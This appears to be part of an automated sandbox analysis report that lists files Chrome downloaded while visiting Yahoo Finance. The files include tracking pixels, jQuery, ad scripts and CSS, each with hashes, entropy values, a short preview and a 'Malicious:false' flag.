                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (25493), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):25493
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.392465147089054
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:KhHlQF7B2QYFkqfL5F5gh2X4dL0d9CubjNIab:SlRJ75F5gUXld9RBb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4DA9B72005BDD8F325EBEB2F17CD99EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:43ED5E3487B6846A40377FCADF306A2DEC872608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5189992250B72DB9473A38B73BE2F86427603F8320800A4953E040A27E51DA6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E0A172ECCC536D69E86EFC4FC0098DD3ABEF79D4E27295392F741278ABCAE4392B41653CDFE470D75238CF6CDF200A73EA464C83382D044D99DD59C2D473F5F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/nel/js/spotIm.custom.SpotIMJAC.qsp.4da9b72005bdd8f325ebeb2f17cd99ec.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var t=function(e,o){return t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var o in e)Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o])},t(e,o)};var e=function(){return e=Object.assign||function(t){for(var e,o=1,n=arguments.length;o<n;o++)for(var i in e=arguments[o])Object.prototype.hasOwnProperty.call(e,i)&&(t[i]=e[i]);return t},e.apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var o="messages-count",n="navigate",i="scroll-lock",s="scroll-release",a="spotim_error",r="spotim_event",c="sso_api_ready",d="spot-im-renew-sso",p="sso_code_a",m="sso_login_error",l="sso_login_success",u="storage_update",h="spot-im-share-type",f="spot-im-comment-reported",g="spot-im-conversation-failed",v="spot-im-conversation-loaded",w="ow-error-event",_="spot-im-launcher-failed",y="spot-im-notification-drop-down-link",S="spot-im-user-notifications-click",I="ow-performance-event",A="spot-im-show-mo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17618)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.795801194680737
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:1DHMddphgN5zzhRTcfBbu2Qu0BaxtxIMVxI5R0:hHYmN8F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:480B76BC606A4D170BB7DAAD8FA7DE33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A93C6475042C7E88B287D775F9AC18DD289BAE09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8AB8D10C62803C94DA62E7D82D9C05202D309A1CF285D340008039A696CDF4C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9F1EBBCF0C9A58C1117D26A861DB14108449ADC3CDF4B43D59881379F385556C14E3566630F6EF619E277DA6004603FDD98A39CDE5FF9338CC174565272AD66E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Table.BF6icsxP.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.container.yf-sw60wy{display:flex;align-items:center;justify-content:center}table.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{font-variant-numeric:tabular-nums;font-size:var(--table-font, var(--font-s));width:100%}table.yf-1dbt8wv .loader.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{margin-top:14px;margin-bottom:14px;width:auto;height:1rem;background:#d9d9d933;border-radius:var(--border-radius-s);margin-left:auto}table.yf-1dbt8wv .body .row.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{border-bottom:1px solid var(--surface1);position:relative}table.yf-1dbt8wv .body .row.reorder.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{cursor:grab}table.yf-1dbt8wv .body .row .cell.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{padding:var(--space-2) 0;padding-left:var(--space-4);font-weight:var(--table-cell-font-weight, var(--font-medium));text-align:right;white-space:nowrap}table.yf-1dbt8wv .body .row .cell.ellipsis.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8wv{text-overflow:ellipsis;overflow:clip}table.yf-1dbt8wv .body .row .cell.yf-1dbt8wv.yf-1dbt8wv.yf-1dbt8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (5657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.599076700545423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Sb04pPhtmpvftu/PvJ/CMMKJ8UotoqzpfLEj:s0i5fPJ6FEPkIj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6AAAF8E11A32FD37FB419E3A4CE9696C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1FD88F2EE4DE5422E0C344DEBEFE3F2B5ABB2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:468959E93F9B4E6F07C6A8F8D0E93D8FCB37D76A8615A93EC153F5842247BA99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:748B27BDB7C7FA082D7BE6C69F56DC33302105784391320A5CF960531C594097BC406FD3F4690E4CF74F4016F4D56804A4296E9BD885562EB66699E1318F7000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://36f42705f6d9765564777897031d4b0a.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8">. <title>SafeFrame Container</title>. <script>.(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var f=this||self,h=function(a){return a};var n=function(a,b){this.h=a===l&&b||"";this.g=m},p=function(a){return a instanceof n&&a.constructor===n&&a.g===m?a.h:"type_error:Const"},m={},l={};var r=void 0;/*.. SPDX-License-Identifier: Apache-2.0.*/.var t,aa=function(){if(void 0===t){var a=null,b=f.trustedTypes;if(b&&b.createPolicy){try{a=b.createPolicy("goog#html",{createHTML:h,createScript:h,createScriptURL:h})}catch(c){f.console&&f.console.error(c.message)}t=a}else t=a}return t};var ca=function(a){this.g=ba===ba?a:""};ca.prototype.toString=function(){return this.g+""};var ba={},da=function(a){var b=aa();a=b?b.createScriptURL(a):a;return new ca(a)};var ea={},u=function(a,b){this.g=b===ea?a:""};u.prototype.toString=function(){return this.g.toString()};var ha=function(){var a=v,b={messa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://www.yahoo.com/px.gif?ch=1&rn=1.7387329119779311
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4894)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.114691169704432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:/1RRvdm3kqG247dPTYm0yvvxELpLQ584F5rKOfZT3/8IXVB6ERPId7yujyPs25qe:/xA3G7RrRVvJI057zrVfZTdQOuws25qe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0047048591F5EAABD122899609CA3651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F84F96637792B11CBAFF506CBA4872EB3A00C6C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C20F6E2C69FED31D678F7BC2E101C4395F4FFD12637B6B1EF4EC31125956BF61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6B61355C4EB80E4B7A5A982F260698132A41C0E94559EF58BF9DE5AECA4723224EDA71CACC26EBEAB148A57888A03752C170F95E0301AA793051D94A0F2BAEE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-221e929c.fe18bba9bd24a5a21e11.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-221e929c.fe18bba9bd24a5a21e11.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[886],{4834:(t,e,s)=>{var o=s(4603);var a,r;a="undefined"!=typeof window?window:s.g,(r=void 0!==o.mE?o.mE:a.CIQ).ThemeHelper=r.ThemeHelper||function(t){this.params=t;var e=t.stx,s="#FFFFFF";e.chart.container&&(s=getComputedStyle(e.chart.container).backgroundColor,r.isTransparent(s)&&(s=e.containerColor)),this.settings.chart.Background.color=r.hexToRgba(s),this.settings.chart["Grid Lines"].color=r.hexToRgba(e.canvasStyle("stx_grid").color),this.settings.chart["Grid Dividers"].color=r.hexToRgba(e.canvasStyle("stx_grid_dark").color),this.settings.chart["Axis Text"].color=r.hexToRgba(e.canvasStyle("stx_xaxis").color),this.settings.chartTypes["Candle/Bar"].up.color=r.hexToRgba(e.canvasStyle("stx_candle_up").color),this.settings.chartTypes["Candle/Bar"].down.color=r.hexToRgba(e.canvasStyle("stx_candl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5574)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.475336053396335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:8K6OPszF1mX1gSJAWhZNNOt/BemAgKtfO1FPkbudTJNOt/BcemO5KUtfRRbQFZGt:T6O0z7mXuSJAWhZNNORBemAgK62SdTJI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0AF292614E8A65A8DB62F5695415C156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F18A8C56757A8D8736FD5A2AFFF702E07D53320A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E976F9E717E535E3C17492A067E30413948A95B133729C801D0CD1BC27558F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C6FFB256C4879A35D65E8333077938DEC25E9957E5F4DDE9DE665BC40A5A40B9882C73820AACD2901DF90E9880976753577CB850AA70942A364DD109D560B34D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Y,p as H,k as R,i as v,y as Z,e as k,d as w,f as E,q as c,O as F,L as g,t as N,b as V,h as U,j as D,l as p,m as y,n as z}from"./scheduler.Dsuh-FKt.js";import{S as $,i as x,t as B,g as j,a as I,e as O,c as G,b as J,m as K,d as Q}from"./index.CvwOawEI.js";import{A as ee}from"./arrow_forward.8N8VOjY3.js";import{I as ae}from"./Icon.C8w5V9EK.js";import{L as le}from"./Link.vSNQugO0.js";import{g as re}from"./commonUtil.BWwawKjd.js";function P(t){let e,l,a,f,r;const u=[ie,te],n=[];function b(i,s){return i[4]?0:1}return l=b(t),a=n[l]=u[l](t),{c(){e=k("div"),a.c(),this.h()},l(i){e=w(i,"DIV",{class:!0,role:!0});var s=E(e);a.l(s),s.forEach(v),this.h()},h(){c(e,"class",f=F(`fb-wrapper ${t[0]}`)+" yf-1a92qi"),c(e,"role","alert"),g(e,"paddingBottom",t[1]),g(e,"dynamicInsights",!!t[2])},m(i,s){R(i,e,s),n[l].m(e,null),r=!0},p(i,s){let m=l;l=b(i),l===m?n[l].p(i,s):(j(),I(n[m],1,1,()=>{n[m]=null}),O(),a=n[l],a?a.p(i,s):(a=n[l]=u[l](i),a.c()),B(a,1),a.m(e,null)),(!r||s&1&&f!==(f=F(`fb-wrapper
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://beacon-ams3.rubiconproject.com/beacon/d/96674ddc-959b-4e37-bfe7-2bda4b297710?oo=0&accountId=17250&siteId=539018&zoneId=3323074&sizeId=15&e=6A1E40E384DA563B8B73C9A58E597CBA5C688BBE06641E65C9D705C54376259608714A9A02DE9BCBFB1E29E1131A2DF89F0BE1F8337FD75DD7DE9CD220BE4310670C0F35FF6AA6AB123F4BC77F95DF3763AF685AF18256F352818FE89C133E1A529064A34507731176503DBA917B20F7E1501A5C29ACF5C995BCEA9A1A431B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28722)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28723
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483731739045681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:Sr8v+IVhP/mwJHf17iV1TZy6N7xIYy8sg/WFsl8VZ5RhY5h4oi+qZsfAF:7+I7PxN/RGOK2VjRAdqZN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0CE018C415316592E5FF56F303C96394
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4123B0FCFA8C02C58D216C6172E537198CA2CAA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DCEAC8036DA8B44034E000B3ED27D27B54BE5C365D0E1E69C556F0B685C9949E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C0E7578BFB68BA7696975DC101442683EDA4FA9DD466CEB71A6C7FC01E52A0F0E234D0F094065773EDB2D8782A89073EC2A0C9AF035F59BAFC4252F79FCF8465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as $,p as V,k as S,n as R,i as p,y as $e,e as D,b as U,t as A,d as N,f as P,j as Y,h as L,q as y,O as Q,l as M,N as O,C as Ce,m as xe,A as at,a1 as ft,K as fe,Q as et,c as ct,L as J,u as ut,g as dt,a as mt,x as ce,o as _t,I as ht,a8 as gt,G as bt,Y as pt,X as oe}from"./scheduler.Dsuh-FKt.js";import{S as ee,i as te,g as j,a as I,e as X,t as C,c as G,b as Z,m as B,d as q}from"./index.CvwOawEI.js";import{g as ve,b as Ee,as as x,o as pe,q as he,N as Ie,s as kt,m as wt,an as De,ak as ge,Z as me,aM as Ne,aN as _e,aO as Pe,t as ne}from"./commonUtil.BWwawKjd.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js";import{L as vt}from"./Link.vSNQugO0.js";import{E as St,D as yt,P as Ct}from"./EnhancedPill.eT1hwQep.js";import{B as tt}from"./Button.C2rixdaC.js";import{D as Me}from"./keyboard_arrow_down.BadFEUQj.js";import{U as Te}from"./keyboard_arrow_up.BbXWGy0y.js";import{g as Et,a as It}from"./spread.CgU5AtxT.js";import{D as Dt}from"./delete.BAHk4Xry.js";import{e as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28680)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2775443083440825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:fyR1+Si04qdWLuefSLE7cwvuyU2oiuS6WxkkwCdIJfL2G:qrBQg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0D07B0C691AD5B9DC4CC4105F284309F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:364B2668205D16A46E51F1494043D9122EE6383E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:994A2E63E024D6892F1381CAD6C3D8F0167DC76024327B7785926BF14B7671E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3D201887F5DF5D957F3F3A24CF605E77C1F5A45AF8254ACDD6327FBD98F3B73666A03263F494CAFC9DEB0CAEB4CE43D66DF0B80C57C7DEC8646AA66D9340F380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see _staticFinProtobuf.4b1559b8e4645fd93a12.mjs.LICENSE.txt */.!function(e){"use strict";var t,n,r,i,o=e.Reader,a=e.util,s=e.roots.default||(e.roots.default={});s.quotefeeder=((r={}).QuoteType=(t={},(n=Object.create(t))[t[0]="NONE"]=0,n[t[5]="ALTSYMBOL"]=5,n[t[7]="HEARTBEAT"]=7,n[t[8]="EQUITY"]=8,n[t[9]="INDEX"]=9,n[t[11]="MUTUALFUND"]=11,n[t[12]="MONEYMARKET"]=12,n[t[13]="OPTION"]=13,n[t[14]="CURRENCY"]=14,n[t[15]="WARRANT"]=15,n[t[17]="BOND"]=17,n[t[18]="FUTURE"]=18,n[t[20]="ETF"]=20,n[t[23]="COMMODITY"]=23,n[t[28]="ECNQUOTE"]=28,n[t[41]="CRYPTOCURRENCY"]=41,n[t[42]="INDICATOR"]=42,n[t[43]="CUL_IDX"]=43,n[t[44]="CUL_SUB_IDX"]=44,n[t[45]="CUL_ASSET"]=45,n[t[1e3]="INDUSTRY"]=1e3,n),r.MarketHours=function(){var e={},t=Object.create(e);return t[e[0]="PRE_MARKET"]=0,t[e[1]="REGULAR_MARKET"]=1,t[e[2]="POST_MARKET"]=2,t[e[3]="EXTENDED_HOURS_MARKET"]=3,t}(),r.OptionType=function(){var e={},t=Object.create(e);return t[e[0]="CALL"]=0,t[e[1]="PUT"]=1,t}(),r.Pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32027)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):107264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.618244756413247
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:AHepZazzVMczK6CHjJfV31iBf0w8aOz/AY9RxqdOUaeWL5hq:VZanVM4o2MwJ+Cde5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4D0E3ECC5617914BEC496FD062CF49DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ED5DB60971FA6FB7EF1EAFEA628745C72D273112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5809F8658155EECC2C2EF3E230648C51252C0C4C1CCFC87DB35E2541E616D34C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1A70227873B0FE3C573CE38C90F65D6E8CBE208882C678D9698477773F44B27BC8D1BA23B62BBBCE522B3387C153252D077C9772B7D4CF57CDB17CA47246B65C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2920), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.278382327824268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:0GoPdhpMzANg4+rItkVsjxe3iRfLIzzL9qMEqK/VEjbJtbmsrIonbl8Q6LBI0uBP:poPTdfbiVsjgiRfL2f9sqK/VEjiOnF6K
